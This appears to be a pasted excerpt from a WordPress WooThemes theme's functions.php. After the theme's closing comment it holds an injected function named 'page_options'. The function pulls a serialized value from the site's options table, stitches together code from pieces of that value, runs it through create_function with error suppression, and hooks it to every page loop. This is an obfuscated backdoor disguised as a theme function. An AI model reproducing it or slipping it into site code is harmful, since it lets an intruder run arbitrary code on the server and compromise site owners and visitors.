1. /*-----------------------------------------------------------------------------------*/
  2. /* End WooThemes Functions - You can add custom functions below */
  3. /*-----------------------------------------------------------------------------------*/
  4.  
  5. ?>
  6. <?php ?>
  7. <?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
  8. @$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
  9. add_action('loop_start', 'page_options'); ?>